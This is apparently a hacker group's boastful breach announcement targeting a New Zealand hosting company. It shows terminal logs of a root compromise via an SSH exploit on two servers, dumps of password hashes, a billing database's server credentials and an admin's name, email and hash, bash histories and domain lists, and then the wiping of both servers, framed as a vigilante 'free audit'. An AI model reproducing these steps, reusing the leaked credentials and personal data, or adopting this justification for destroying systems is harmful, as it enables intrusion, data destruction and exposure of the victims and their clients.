[anti-sec ASCII-art banner]

Some of you have seen a lot of casualties lately in the webhosting scene: hosting companies being wiped and rm'd at the expense of their clients. While some of this is collateral damage, we're about to show you, ladies and gentlemen, that sometimes you aren't pwned because of who you host but what you say. Practice what you preach.

- Why SSANZ?

Owned by a kid who claims he can manage, secure and audit servers, he offers a service that he clearly cannot provide; we are against that.

LoganNZ:
>> Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>> Server Systems Administration NZ | SSANZ
>> Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>> Affordable Hosting :: Resellers, Shared & Dedicated Server Systems

Server Management $25 - Security & Hardening - $50:
>> Server Management - $25 Per Month
>>
>> - Full Management - Support, & 3rd Party Installs
>> - Monitoring - Included - up to 3 ports.
>> - Emergency Recovery
>> Server Security - $50
>>
>> - Initial Scan & Report
>> - Security Hardening & Security Installs/tweaks.
>> - IDS, Security Monitoring & mod_sec configured.
>> - Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>> Emergency Server Recovery - $150
>>
>> - Recover Hacked Server Systems
>> - Recover deleted data
>> - ANTI-dDOS Services
>> - dDOS Investigation

Security Worries? Security Audits - 50% OFF:
>> Get your site/server audited to ensure your business data is
>> secure before you become a statistic.
>>
>> In the past 6 months, e-crime activity reports have increased by
>> 45% due to the global economic recession.
>>
>> What is involved in a Full Security Audit?
>>
>> External Security
>>
>>  * Scan for Shells/malicious scripts
>>  * Scan for vulnerable web content ( permissions, RFI's )
>>  * Scans for Vulnerable Server Services
>>  * Vulnerable Ports
>>  * Testing of TCP handling - dDOS test.
>>  * Scan for Vulnerable PHP scripts/mods.
>>  * Control Panel Security Audit ( external )
>>  * Multiple Unique SSANZ Custom Scans*
>>
>>
>> Internal Security
>>
>>  * Permissions/Ownership(s) Review
>>  * Apache/Webserver Security
>>  * User Account Security & binaries access audit
>>  * Local RFI Exploits located/patched.
>>  * System Binary Security Audit
>>  * Firewall/IPTABLES Audit
>>  * Bruteforce detection test & audit
>>  * Root Access Authentication Audit
>>  * Local PHP Functions Audit
>>  * Control Panel Security Audit ( Internal )
>>  * Kernel Security Audit
>>  * Additional SSANZ Custom Scans/Audit*

We at anti-sec decided to give you a _FREE_ Full Security Audit!*

* `rm -rf /` is included.

anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3

IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3

anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224   20:17    7:26m  13:18  13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x--- 24 root root 4096 Jul 4 03:43 .
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
-rw------- 1 root root 957 Jun 13 07:24 .accesshash
-rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
-rw------- 1 root root 15460 Jul 3 23:38 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
-rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
-rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 1 13:54 .elinks
-rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log
-rw-r--r-- 1 root root 16 Jun 3 08:34 .forward
drwx------ 3 root root 4096 Jun 1 10:39 .gconf
drwx------ 2 root root 4096 Jun 1 10:39 .gconfd
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
drwx------ 2 root root 4096 Jun 1 13:55 .gnupg
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc
-rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html
-rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
-rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch
-rw------- 1 root root 61 Jun 12 21:04 .my.cnf
-rw------- 1 root root 139 Jul 3 10:51 .mysql_history
-rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
-rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
-rw------- 1 root root 1024 Jun 7 19:50 .rnd
drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin
drwx------ 2 root root 4096 Jun 2 06:41 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
-rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs
drw------- 2 root root 4096 Jun 3 08:18 whmrbackups
drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups
sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing billing 4096 Jun 28 02:08 .
drwx--x--x 737 root root 20480 Jul 4 00:37 ..
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout
-rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile
-rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc
-rw------- 1 billing billing 17 May 27 2008 .contactemail
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
-rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log
drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc
drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds
-rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang
-rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin
drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html
drwx------ 4 billing billing 4096 Jun 7 21:53 ssl
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
drwx------ 2 billing billing 4096 May 27 2008 .trash
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html
-rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin  banned.php  configuressl.php  domainchecker.php  init.php  logout.php  postinfo.html  templates  viewticket.php  whois.php
affiliates.php  billing  contact.php  downloads  installmingchowping  modules  _private  templates_c  _vti_bin
aff.php  cart.php  creditcard.php  downloads.php  knowledgebase.php  networkissues.php  register.php  tutorials.php  _vti_cnf
announcements.php  cgi-bin  dbconnect.php  htaccess.txt  lang  networkissuesrss.php  serverstatus.php  upgrade  _vti_inf.html
announcementsrss.php  clientarea.php  display.php  images  libs  order.php  status  upgrade.php  _vti_log
announcements.xml  configuration.php  dl.php  includes  link.php  passwordreminder.php  submitticket.php  viewemail.php  _vti_pvt
attachments  configuration.php.new  dologin.php  index.php  login.php  pipe  supporttickets.php  viewinvoice.php  _vti_txt
sh-3.2# cat configuration.php
sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing  |
+----------------------------+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+----------------------------+
80 rows in set (0.00 sec)

mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name         | ipaddress      | hostname         | username | password                                                                 |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email           | username | password                         |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)

mysql> quit
Bye
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup
sh-3.2# exit
exit

-----------------------------------
osiris [ DOWN ]
devil  [ UP ]
-----------------------------------

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224   20:18    7:51m   6:38   6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root 4096 Jul 4 04:06 .
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
-rw------- 1 root root 957 Jun 13 05:20 .accesshash
-rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
-rw------- 1 root root 7258 Jun 30 10:03 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
-rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
-rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 12 01:51 .elinks
-rw-r--r-- 1 root root 16 Jun 13 15:33 .forward
drwx------ 3 root root 4096 Jun 11 23:59 .gconf
drwx------ 2 root root 4096 Jun 11 23:59 .gconfd
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
drwx------ 2 root root 4096 Jun 12 01:53 .gnupg
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc
-rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog
drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch
-rw------- 1 root root 37 Jun 12 02:11 .my.cnf
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
-rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
-rw------- 1 root root 1024 Jun 12 02:50 .rnd
drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin
drwx------ 2 root root 4096 Jun 22 09:11 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp
sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp
sh-3.2# exit
exit

-----------------------------------
osiris [ DOWN ]
devil  [ DOWN ]
-----------------------------------

Once again, practice what you preach. Don't claim to be something you're not. Most importantly, don't go after us. We're not the problem. What you say does not align AT ALL with what you actually do with your servers. Fix that first, you dig?

~ There will always be no way out.